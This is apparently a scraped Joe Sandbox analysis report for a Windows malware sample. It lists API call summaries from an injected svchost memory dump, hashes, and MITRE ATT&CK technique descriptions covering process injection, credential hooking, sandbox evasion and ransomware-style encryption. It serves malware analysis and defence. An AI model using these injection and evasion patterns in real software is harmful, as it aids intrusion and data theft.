Opcode Fuzzy Hash: b9238d8f38c6c9b7fd48eed581efc970d75e5380c7242eaf7ff49e1a1a5f43d3
Instruction Fuzzy Hash: 991160B2804329ABC711AF21DC04D5BBFACFFC57A4F060A19FD55A3150DB32D9198BA2

Uniqueness

Uniqueness Score: -1.00%

Function 02A54EEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56processthreadCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,02A54EC9,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?), ref: 02A54F35

Part of subcall function 02A549EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02A54F4C,?,?), ref: 02A54A7A
Part of subcall function 02A549EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02A54F4C,?,?,?,?,?), ref: 02A54A81
Part of subcall function 02A549EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02A54F4C,?,?), ref: 02A54A92
Part of subcall function 02A549EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02A54F4C,?,?,?,?,?), ref: 02A54A99

ResumeThread.KERNEL32(02A549A2,?,?,?), ref: 02A54F51
CloseHandle.KERNEL32(02A549A2,?,?,?), ref: 02A54F5A

Strings

D, xrefs: 02A54F02

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$CloseCreateHandleResumeThread
String ID: D
API String ID: 2798461596-2746444292
Opcode ID: 8f9f103e51202ba47a03d464601cf2903ff22d423a14b8d2dde7a7e1607a9efc
Instruction ID: 78a14b9803e5e30d8c3ddbd0cec7fdff9a35ba1aa94a9b4f704ad53b122bdbdc
Opcode Fuzzy Hash: 8f9f103e51202ba47a03d464601cf2903ff22d423a14b8d2dde7a7e1607a9efc
Instruction Fuzzy Hash: B00112B294021CBFEB419AE8DC85DFFB7BDFB48744F000425FA05E6050EB319D188A61

Uniqueness

Uniqueness Score: -1.00%

Function 02A527E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02A527F9
CreateProcessW.KERNEL32(00000000,02A562F0,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02A52825
ExitProcess.KERNEL32 ref: 02A5282C

Strings

D, xrefs: 02A52800

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Process$CreateExitmemset
String ID: D
API String ID: 2480966106-2746444292
Opcode ID: e0d036269bbd7b3c2c998c722aa38e4b7950d8f9a414a650456bceae1b7d0be8
Instruction ID: bcf97499215775219599a181669098edb60835394e776e047428c95f580659b7
Opcode Fuzzy Hash: e0d036269bbd7b3c2c998c722aa38e4b7950d8f9a414a650456bceae1b7d0be8
Instruction Fuzzy Hash: E0E0EDB184075C7EE740DAF8CD85EAFF7BCAB08704F400825B706E6050DA789E1C8A66

Uniqueness

Uniqueness Score: -1.00%

Function 02A55208 Relevance: 6.4, APIs: 5, Instructions: 114memorysleepCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A5525E
Sleep.KERNEL32(00001388), ref: 02A55271
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A5528A
GetProcessHeap.KERNEL32(00000000,?), ref: 02A55327
GetProcessHeap.KERNEL32(00000000,?), ref: 02A55333

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$Sleep
String ID:
API String ID: 1699386916-0
Opcode ID: fa6f66de3f1a5187b1b4be8109f04ac7ace2b1e28823f5b3ef1932e5356ea31c
Instruction ID: 98d862aebd92f9af1aeca08e05d3ddc158516b4f2ad8c21e2f6b15cc9d0474ee
Opcode Fuzzy Hash: fa6f66de3f1a5187b1b4be8109f04ac7ace2b1e28823f5b3ef1932e5356ea31c
Instruction Fuzzy Hash: 7F41AE729043109BD720DFA4CC88B6BB7E9EF84329F840E5DF99992190DF74E558CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02A55B4F Relevance: 6.1, APIs: 4, Instructions: 89registrystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?), ref: 02A55B64

Part of subcall function 02A52F1A: CryptAcquireContextW.ADVAPI32(02A57658,00000000,00000000,00000001,F0000000,02A562B0,?,?,?,02A55B88,?,00000000,?,?,02A57658,?), ref: 02A52F35
Part of subcall function 02A52F1A: CryptCreateHash.ADVAPI32(02A57658,00008003,00000000,00000000,?,00000000,?,?,?,02A55B88,?,00000000,?,?,02A57658,?), ref: 02A52F52
Part of subcall function 02A52F1A: CryptHashData.ADVAPI32(?,02A57658,?,00000000,?,?,?,02A55B88,?,00000000,?,?,02A57658,?), ref: 02A52F68
Part of subcall function 02A52F1A: CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02A55B88,?,00000000,?,?,02A57658,?), ref: 02A52F83
Part of subcall function 02A52F1A: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02A55B88,?,00000000,?), ref: 02A52FA3
Part of subcall function 02A52F1A: CryptDestroyHash.ADVAPI32(?,?,?,?,02A55B88,?,00000000,?,?,02A57658,?), ref: 02A52FB3
Part of subcall function 02A52F1A: CryptReleaseContext.ADVAPI32(02A57658,00000000,?,?,?,02A55B88,?,00000000,?,?,02A57658,?), ref: 02A52FC2

Part of subcall function 02A544D2: wsprintfA.USER32 ref: 02A54509

RegDeleteKeyA.ADVAPI32(80000001,?), ref: 02A55BF4

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDeleteDestroyParamReleaselstrlenwsprintf
String ID:
API String ID: 1772175150-0
Opcode ID: 94e8259b52c181c963e35ffc2882fb0595c515447e13b79563c3a3f1f7bf7d20
Instruction ID: 36e8c851f123c9f76da9f81aa31e9711f345c0c8612c91b3afcd4e61bf36cf19
Opcode Fuzzy Hash: 94e8259b52c181c963e35ffc2882fb0595c515447e13b79563c3a3f1f7bf7d20
Instruction Fuzzy Hash: DA21A2728442699FDB119FA4DC88AEFBBBCEB05320F540555FD15E6101DB31D545CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A53803 Relevance: 6.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,?,00000000,02A53904,?,00000000,00000000,00000000,00000007,?,?), ref: 02A53855
RtlReAllocateHeap.NTDLL(00000000,?,00000000,02A53904), ref: 02A5385C

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 6ed99d548de285833178e78ebbe6c0afb970973905ef74bc69207e70bd037214
Instruction ID: 217f3a1692bb80e75e9c69386d31e3bd54424cc4ef00bce322df6bf2c80561a9
Opcode Fuzzy Hash: 6ed99d548de285833178e78ebbe6c0afb970973905ef74bc69207e70bd037214
Instruction Fuzzy Hash: F4118C72A003218BCB358F69D884B67B7E5AFC5695F1848ADE9D2C7204DB78E4468B10

Uniqueness

Uniqueness Score: -1.00%

Function 02A5540D Relevance: 6.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 02A5542D
RtlAllocateHeap.NTDLL(00000000), ref: 02A55434
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A55496
HeapFree.KERNEL32(00000000), ref: 02A5549D

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 53d06b47c710cba8227816b71157ade234f61c58397524556504c44984997a0b
Instruction ID: 283a9e8a5dfcecf57e2a605ee696aa91a4564af543c879a209bdcb7d9cca2b23
Opcode Fuzzy Hash: 53d06b47c710cba8227816b71157ade234f61c58397524556504c44984997a0b
Instruction Fuzzy Hash: 2F110677D403246BCB109EA9DC88EABB77EAB88611F444565FE49E7104DF30D8058BB0

Uniqueness

Uniqueness Score: -1.00%

Function 02A54AA7 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,02A54F4C,?,?), ref: 02A54AD7
RtlAllocateHeap.NTDLL(00000000), ref: 02A54ADE
GetProcessHeap.KERNEL32(00000008,0000056E,?,?,?,?,?), ref: 02A54B0A
RtlAllocateHeap.NTDLL(00000000), ref: 02A54B11

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: ebf9f7fac69ca3fe8b3a174d725ae37b50fa544858a17d24fda813d2d68f8452
Instruction ID: c2047b85463467be25996744ff846ace171c865abbeb6e242153cb317a0ae9da
Opcode Fuzzy Hash: ebf9f7fac69ca3fe8b3a174d725ae37b50fa544858a17d24fda813d2d68f8452
Instruction Fuzzy Hash: 89118C71A40722ABEBA19F74DC49B13B7E4BB08340F088829FB86D61A0EF31D454DB14

Uniqueness

Uniqueness Score: -1.00%

Function 02A51496 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A514DF
HeapFree.KERNEL32(00000000), ref: 02A514E6

Strings

!, xrefs: 02A514A3
!, xrefs: 02A514C6

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID: !$!
API String ID: 3859560861-2068775997
Opcode ID: 5332fc33da48d104af3ce2b14b2722f268f9162dde9184f653c8126ddac45d43
Instruction ID: c4d1e87ca48628c0cd67fdb648b51b375d6a411ebaf80adfd8b981185bdebb2e
Opcode Fuzzy Hash: 5332fc33da48d104af3ce2b14b2722f268f9162dde9184f653c8126ddac45d43
Instruction Fuzzy Hash: E6F06DB26842246EFB105A64DC49BFB7BADEB14750F484411FD08C5280EF70D990CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 02A525E3 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,02A57328), ref: 02A525F6
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02A52612
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02A52623
GetLastError.KERNEL32 ref: 02A5262D

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastlstrcpy
String ID:
API String ID: 1615007319-0
Opcode ID: d529522f8e395af99888185ce86f5dd35917d38f27e906ab3ea9e66761ae576a
Instruction ID: dada40280cfa6b4024b0c4eec12a91059a1b8457e830c75dcc918f23495087c9
Opcode Fuzzy Hash: d529522f8e395af99888185ce86f5dd35917d38f27e906ab3ea9e66761ae576a
Instruction Fuzzy Hash: 1AF03071A44259ABE72096B6AC8DEAFBBFCEFC5B15F40402EFC05D2140EE25D815CA31

Uniqueness

Uniqueness Score: -1.00%

Function 02A51FE9 Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A51FF0
CreateThread.KERNEL32(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02A52009
CloseHandle.KERNEL32(00000000), ref: 02A52014
CloseHandle.KERNEL32 ref: 02A52025

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: CloseCreateHandle$EventThread
String ID:
API String ID: 1117116137-0
Opcode ID: a14cd491b056ca61d95f4fa97e7b8822f0c0f0873f4722c19fbf4b2ee0361a1c
Instruction ID: 544fa15c54602306f6bc31c8fd61eeb619e1e03cf57fd8747fe9ad5cbc4b1128
Opcode Fuzzy Hash: a14cd491b056ca61d95f4fa97e7b8822f0c0f0873f4722c19fbf4b2ee0361a1c
Instruction Fuzzy Hash: F9E01A309922317A96316B37BC0CEC77E9DFF0A7A53414821B80AE1118DF20C816C5F0

Uniqueness

Uniqueness Score: -1.00%

Function 02A549EE Relevance: 5.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02A54F4C,?,?), ref: 02A54A7A
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02A54F4C,?,?,?,?,?), ref: 02A54A81
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02A54F4C,?,?), ref: 02A54A92
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02A54F4C,?,?,?,?,?), ref: 02A54A99

Part of subcall function 02A54B3F: lstrcpy.KERNEL32(?,?), ref: 02A54C69

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$lstrcpy
String ID:
API String ID: 25539217-0
Opcode ID: 8d1ce49d5d7d7e66183b86535914b9ca906490b8d4b3445a6f10c6c95cd30efc
Instruction ID: ce033b8223432b1f9df05f0a5c5be72fa54523a061a55f06d4687555493e3c0f
Opcode Fuzzy Hash: 8d1ce49d5d7d7e66183b86535914b9ca906490b8d4b3445a6f10c6c95cd30efc
Instruction Fuzzy Hash: F1211A768083259FC350DFA4D84494BBBE8FF8C394F04491EFA89E7214DB34D9858B86

Uniqueness

Uniqueness Score: -1.00%

Function 02A5492A Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,02A570E8), ref: 02A54982
HeapFree.KERNEL32(00000000,?,?,00000000,02A570E8), ref: 02A54989
GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,02A570E8), ref: 02A549B1
HeapFree.KERNEL32(00000000,?,?,00000000,02A570E8), ref: 02A549B8

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d3dc1ba6ab5454ae0f002b285e2c756783195e1c360da4f2cb7433e1000e9d05
Instruction ID: 14c209b1a6104d27c65fc1d2ee8b464d25b5bcb0249da0b89990ebb44a52f6f5
Opcode Fuzzy Hash: d3dc1ba6ab5454ae0f002b285e2c756783195e1c360da4f2cb7433e1000e9d05
Instruction Fuzzy Hash: 8011DD72944228FBDB10DFA49845BEBB7BCBB48301F044559ED00A6144EB30DA548B90

Uniqueness

Uniqueness Score: -1.00%

Function 02A5136A Relevance: 5.1, APIs: 4, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A513EC
HeapFree.KERNEL32(00000000), ref: 02A513F3

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: fd557d731ab8577e4d822dd4292caf62ce6e8e6388ff1bd1839649127d187242
Instruction ID: f43ae522ad83d81757c9a627004510c1a80abf153428b4bfeff1ab97a5d00e65
Opcode Fuzzy Hash: fd557d731ab8577e4d822dd4292caf62ce6e8e6388ff1bd1839649127d187242
Instruction Fuzzy Hash: 68111676D40229ABDF50DFE58984BAFBBFCAF48351F104565E908E2100EF7586558BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A51404 Relevance: 5.1, APIs: 4, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A5146A
HeapFree.KERNEL32(00000000), ref: 02A51471
GetProcessHeap.KERNEL32(00000000,?), ref: 02A5147E
HeapFree.KERNEL32(00000000), ref: 02A51485

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: eb608beeecde9cb4cab135f8f57dfab37c7a592af67696fccc662f2655e99184
Instruction ID: 24c8a887dfa5a31215ae0a07a957129839d365a8abfc7676631329df9252c48b
Opcode Fuzzy Hash: eb608beeecde9cb4cab135f8f57dfab37c7a592af67696fccc662f2655e99184
Instruction Fuzzy Hash: EE1124B1D40229ABDB009FE98D847EFFBFCEF09314F104566E909A3100DB759A458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A51F56 Relevance: 5.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02A51CD5: GetProcessHeap.KERNEL32(00000008,?,?,00000000), ref: 02A51CFD
Part of subcall function 02A51CD5: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02A51D04
Part of subcall function 02A51CD5: lstrcpy.KERNEL32(00000000,?), ref: 02A51D2D
Part of subcall function 02A51CD5: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02A51DF6
Part of subcall function 02A51CD5: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 02A51DFD
Part of subcall function 02A51CD5: Sleep.KERNEL32(00001388,?,?,?,?,00000000), ref: 02A51E08

GetProcessHeap.KERNEL32(00000000,?), ref: 02A51FB4
HeapFree.KERNEL32(00000000), ref: 02A51FBB
GetProcessHeap.KERNEL32(00000000,?), ref: 02A51FC3
HeapFree.KERNEL32(00000000), ref: 02A51FCA

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpy
String ID:
API String ID: 1268735806-0
Opcode ID: 3923e81b23aa7072e976479d183779bcb681fec53185ed4286bad1d17dbdcddc
Instruction ID: 37a41f3c7d11ae09459783a59dc735e473fc3a55b600a19cc01c55fb5314e0fa
Opcode Fuzzy Hash: 3923e81b23aa7072e976479d183779bcb681fec53185ed4286bad1d17dbdcddc
Instruction Fuzzy Hash: 2101A9718083559FC710DFA6D848A5BBBE8FF4C314F04491EF99992200EB35E619CF96

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report GziaFibS0d.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

